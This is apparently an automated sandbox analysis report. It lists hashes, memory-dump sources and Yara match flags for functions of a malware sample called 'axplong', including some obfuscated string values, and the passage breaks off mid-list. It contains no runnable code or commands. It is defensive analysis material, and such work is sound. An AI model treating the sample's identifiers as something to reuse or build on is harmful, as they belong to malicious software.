                      Function 04B10DC5 Relevance: .1, Instructions: 91COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59db565f5ddd7bd6997dc4de9170cbcf05e63510814465a320edcfe3b3ba5eb6
                      • Instruction ID: 3dcc84417744c5a909839c488c518124897515045e47db926c0a3ca15fa24013
                      • Opcode Fuzzy Hash: 59db565f5ddd7bd6997dc4de9170cbcf05e63510814465a320edcfe3b3ba5eb6
                      • Instruction Fuzzy Hash: 191104A724C110BCE741A5826B40AF67B6AE7C7730770889AF446C4816F29526C9B530
                      Function 04B10DDF Relevance: .1, Instructions: 64COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d526081b02093c24491a1f7e6582c3cafb648bf57ee6563e24351e827bc53c75
                      • Instruction ID: 4ef852a237f3cd89e51564314cf61698489bb0717aa3329808225eb9da93edf0
                      • Opcode Fuzzy Hash: d526081b02093c24491a1f7e6582c3cafb648bf57ee6563e24351e827bc53c75
                      • Instruction Fuzzy Hash: 69F0F4EB64C110BD6382A48227949F63BAEE6D33303718CAAF446C5912F2CA1ACD7171
                      Function 04B10DFA Relevance: .1, Instructions: 55COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1718919f85df6feb04a23613c40eec4c09ab880396d32cd01175ae8b5683051f
                      • Instruction ID: ac1110e316602a7150e815dae3c8f042b76d6df65b39abf6c9ddb2ae89116cab
                      • Opcode Fuzzy Hash: 1718919f85df6feb04a23613c40eec4c09ab880396d32cd01175ae8b5683051f
                      • Instruction Fuzzy Hash: F3F0C8AB64C200BEA74265822B549FA7B7EE6D36303718CABF442C2412F395198DA531
                      Function 04B10E36 Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34861bc9caabba1d2df65eac68194405b4aae3a9e2e2014df55613399be954b5
                      • Instruction ID: 30bb01a6570ab27e82bee6ee331203cdffdf24ef78508652e12eb9aef7a82d9a
                      • Opcode Fuzzy Hash: 34861bc9caabba1d2df65eac68194405b4aae3a9e2e2014df55613399be954b5
                      • Instruction Fuzzy Hash: D8E086B768C214DE6344B5832694AB77B6DE2C66303F18CE7F046C2C15F29A1ACD7572
                      Function 04B10E3F Relevance: .0, Instructions: 29COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ffe08e5d61901d6be360d3cae918a0e0638919ad09792ee4ba0e236f5548e270
                      • Instruction ID: 802e0725b3ea4092dfbc692d90ff1991d23ff4e27bdb378bbd1837296ec9fb12
                      • Opcode Fuzzy Hash: ffe08e5d61901d6be360d3cae918a0e0638919ad09792ee4ba0e236f5548e270
                      • Instruction Fuzzy Hash: 68E086A774C210EEA385A683264457A776DE6D26343B08C97F082C1416F39929D97671
                      Function 04B10E57 Relevance: .0, Instructions: 22COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 13ae0b0035d0f9bf3aba9fa2db664be2e0ad9fd680734fd79a41437d2c5c3027
                      • Instruction ID: 013e62e085d9322c91905943cea2353d2865f4aabc78e640eb19902ce3d9e08f
                      • Opcode Fuzzy Hash: 13ae0b0035d0f9bf3aba9fa2db664be2e0ad9fd680734fd79a41437d2c5c3027
                      • Instruction Fuzzy Hash: 9AD05E7778C200DEA389A68372941BA7B69E7D12303B08CE7E182C1815F7A91489B531
                      Function 04B10E6D Relevance: .0, Instructions: 21COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2511391322.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_4b10000_axplong.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fed686a3afd824bf7d7c4eb0b54c47c24a2b4978c99857040ef1e9d2d4ae2d72
                      • Instruction ID: b01c2f99b7fef86fe9a9d0ea7a531e55472bf3fb395355333e5fe4b99f237372
                      • Opcode Fuzzy Hash: fed686a3afd824bf7d7c4eb0b54c47c24a2b4978c99857040ef1e9d2d4ae2d72
                      • Instruction Fuzzy Hash: B7D022A364C2009ED20020135E926F3235CA3A26207B08DA3A102C35C3F1A6A1CD3070

                      Non-executed Functions

                      Function 00A7E440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
                      • API String ID: 0-214772295
                      • Opcode ID: 1b8b1170ec9523b8f9e117d0b6767437294319bc391dc6ba08f30eab518de1ee
                      • Instruction ID: c72cbd8055edfa59a909b9359b5e576c89812c2bc2f6a40aeb873b259ee71e3a
                      • Opcode Fuzzy Hash: 1b8b1170ec9523b8f9e117d0b6767437294319bc391dc6ba08f30eab518de1ee
                      • Instruction Fuzzy Hash: 6E82F570904248DBEF14EF68CA497DE7FB6AF46304F608199E815273C2D7759A88CBD2
                      Function 00AB3068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 6559d4a548ee165c09ed4a91d467cc2c8202e0e3a00333a721c15036d82eb0a6
                      • Instruction ID: 7057bcfd88971f19e3a2e7a41c16abf594ad8059b32342b2e3cd89014740e483
                      • Opcode Fuzzy Hash: 6559d4a548ee165c09ed4a91d467cc2c8202e0e3a00333a721c15036d82eb0a6
                      • Instruction Fuzzy Hash: 59C21B72E046288FDF25CF28DD407EAB7B9EB48305F1441EAD44DA7242E779AE858F41
                      Function 00AB2BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: c7ef36b2ee08efa8d3d729a6a39fd1672abc09bad681db53fdaab860fe320b5f
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 0AF11C71E012199BDF14CFA9C9807EEBBB5FF48314F15826AE819AB345D731AE41CB90
                      Function 00A8CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,00A8CE82,?,?,?,?,00A8CEB7,?,?,?,?,?,?,00A8C42D,?,00000001), ref: 00A8CB33
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 91b9c794c1d8efaa99cf7f03d919d2a9e7e94fbe4dc0c1f18b5bccf21b0de686
                      • Instruction ID: 327f7f8597caeac62ef0ff8555e1557836fa221b7c3610aa51a55c85278ca2d2
                      • Opcode Fuzzy Hash: 91b9c794c1d8efaa99cf7f03d919d2a9e7e94fbe4dc0c1f18b5bccf21b0de686
                      • Instruction Fuzzy Hash: 0FD02232903838D3CA013BF0AC08CACBB58CF00B243090116ED0A63120CA20AC424FE0
                      Function 00AA7D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 0919108ff403e83479ba11f8857068e70a3d369af6f4337063085e13988f964a
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: 9A517A7020C6485BDF398B388D957BF67AA9F53300F18046ED442D76C2DB16DE45C752
                      Function 00A74CF0 Relevance: .7, Instructions: 701COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e8b36bc7fc1f8d1c9b37845a51e03a3553136a56448a67cfe5dea2689d417888
                      • Instruction ID: 41d457ef88dc7f7694b9efd10a030f94f80b7388e80692dbd426736994b39df7
                      • Opcode Fuzzy Hash: e8b36bc7fc1f8d1c9b37845a51e03a3553136a56448a67cfe5dea2689d417888
                      • Instruction Fuzzy Hash: A5224EB3F515144BDB4CCA9DDCA27EDB3E3AFD8214B0E803DA40AE3345EA79D9158A44
                      Function 00AB6F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59cd26ecebcc3604242d28ee9fec23bf8d3fb8d11816d5e79447c3312c6e628c
                      • Instruction ID: 8eda1e8bac5f1ff51023a7aee96aa3dde7e26fda19473063f3427fa418f13b4d
                      • Opcode Fuzzy Hash: 59cd26ecebcc3604242d28ee9fec23bf8d3fb8d11816d5e79447c3312c6e628c
                      • Instruction Fuzzy Hash: F7B17E31214608DFD715CF2CC486BA97BB4FF85364F258659E89ACF2A2C376E981CB40
                      Function 00A8D312 Relevance: .2, Instructions: 172COMMON
                      Download Yara Rule
                      APIs
                      • ___std_exception_copy.LIBVCRUNTIME ref: 00A7247E
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: ___std_exception_copy
                      • String ID:
                      • API String ID: 2659868963-0
                      • Opcode ID: a58746427c3a4a88d5ecf45a1c1e082a940012ec32200c271174db70be194782
                      • Instruction ID: 9f4f35a1097fa477d1502bb7f6e28489149e1fc1ae2179cda3c5a654a22bae96
                      • Opcode Fuzzy Hash: a58746427c3a4a88d5ecf45a1c1e082a940012ec32200c271174db70be194782
                      • Instruction Fuzzy Hash: 0551BDB1E016058FDB19DFA9D8857AEBBF0FB18350F24856AD806EB2A0D7349D41CF50
                      Function 00A74AF0 Relevance: .2, Instructions: 158COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3ae0dd4b086f2cf83f0c697960ad3aa3fd2c42918f9a070a6e7e01822036b2a3
                      • Instruction ID: 7ce433658e6685360c6bb5cd7eaa925c6bf952acbd4e6f4ce211fd02005a9479
                      • Opcode Fuzzy Hash: 3ae0dd4b086f2cf83f0c697960ad3aa3fd2c42918f9a070a6e7e01822036b2a3
                      • Instruction Fuzzy Hash: F751A4716083918FD319CF2D851563ABFE1BFDA200F098A9EE4DA87292D774DA44CBD1
                      Function 00AB777B Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D4F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D7C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D88000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000D96000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2508614459.0000000000D97000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509118168.0000000000F3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2509143725.0000000000F3F000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_13_2_a70000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 38623dbc4430b2ff40395ab0acf93160a5cd604c4e0d37213352643de0ddd41f
                      • Instruction ID: 2d933547bb2666770a9bbdcd6a3062500913e1f7c79c18a6650f1778c2574d7c
                      • Opcode Fuzzy Hash: 38623dbc4430b2ff40395ab0acf93160a5cd604c4e0d37213352643de0ddd41f
                      • Instruction Fuzzy Hash: 2D21B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4
                      Function 00AB765B Relevance: .1, Instructions: 81COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, Offset: 00A70000, based on PE: true
                      • Associated: 0000000D.00000002.2504368929.0000000000A70000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2504989178.0000000000AD2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2506298911.0000000000AD9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000ADB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmpDownload File
